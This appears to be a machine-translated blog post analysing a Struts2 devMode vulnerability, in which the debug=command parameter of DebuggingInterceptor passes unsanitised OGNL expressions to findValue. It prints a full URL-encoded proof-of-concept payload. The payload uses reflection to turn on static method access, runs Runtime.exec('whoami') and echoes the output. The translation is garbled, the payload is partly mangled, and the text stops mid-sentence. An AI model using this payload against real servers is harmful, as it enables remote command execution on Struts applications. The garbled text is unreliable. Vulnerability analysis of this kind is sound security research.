See online on struts2 using the article very much, but for the vulnerability trigger the tracking analysis of the document is relatively small, nothing else to track it struts recent fights compared to fire two vulnerabilities, Research a bit to stabilize the use of the payload to.
Struts2 framework there is a devmode mode, to facilitate developers to debug the program, but the default devmode is not enabled, if you want to use, you need to manually modify the parameters, it may be the struts. properties of the devmode is set to true, either in struts. xml add the following code
<constant name="struts. devMode" value="true" />
Actually devmode relies on struts2 the bottom of the struts2-core. jar in the DebuggingInterceptor. java implementation, then the vulnerability is also present in this program. Here I am in debug=command this logic, testing for vulnerabilities, my POC is as follows:
http://localhost:8 0 8 0/S2-0 1 6/hello. action? debug=command&expression= %23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccessemail@example.com.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java. io. InputStreamReader%2 8%23a%2 9%2c%23c%3dnew java. io. BufferedReader%2 8%23b%2 9%2c%23d%3dnew char%5b50000%5d%2c%23c. read%2 8%23d%2 9%2c%23genxor%3d%23context. get%2 8%22com. opensymphony. xwork2. dispatcher. HttpServletResponse%2 2% 2 9. getWriter%2 8% 2 9%2c%23genxor. println%2 8%23d%2 9%2c%23genxor. flush%2 8% 2 9%2c%23genxor. close%2 8% 2 9
First, here is a devmode of several modes,
Continue to track The DebuggingInterceptor. the java code, found the problem in the following logic which
Tracking parameters as shown in Figure
You can see here
String cmd = getParameter(EXPRESSION_PARAM); ... writer. print(stack. findValue(cmd));
Here the cmd didn't do any processing, directly behind the findValue（findValue be able to execute OGNL expressions, with specific reference to the official documents, resulting in the OGNL expression execution.
About this vulnerability to perform, in fact, nothing to say, the key is the payload calls the java reflection classes(can access some private member variables)to bypass the struts2 limit the execution of a java static method of the rule of law rules, so that before the apache official fix yet in vain. Because struts2 in 2. 3. 1 4. 1 version after set#_memberAccess[“allowStaticMethodAccess”]is not modified, and you want to call the java static method must be set allowStaticMethodAccess to true. Here the use of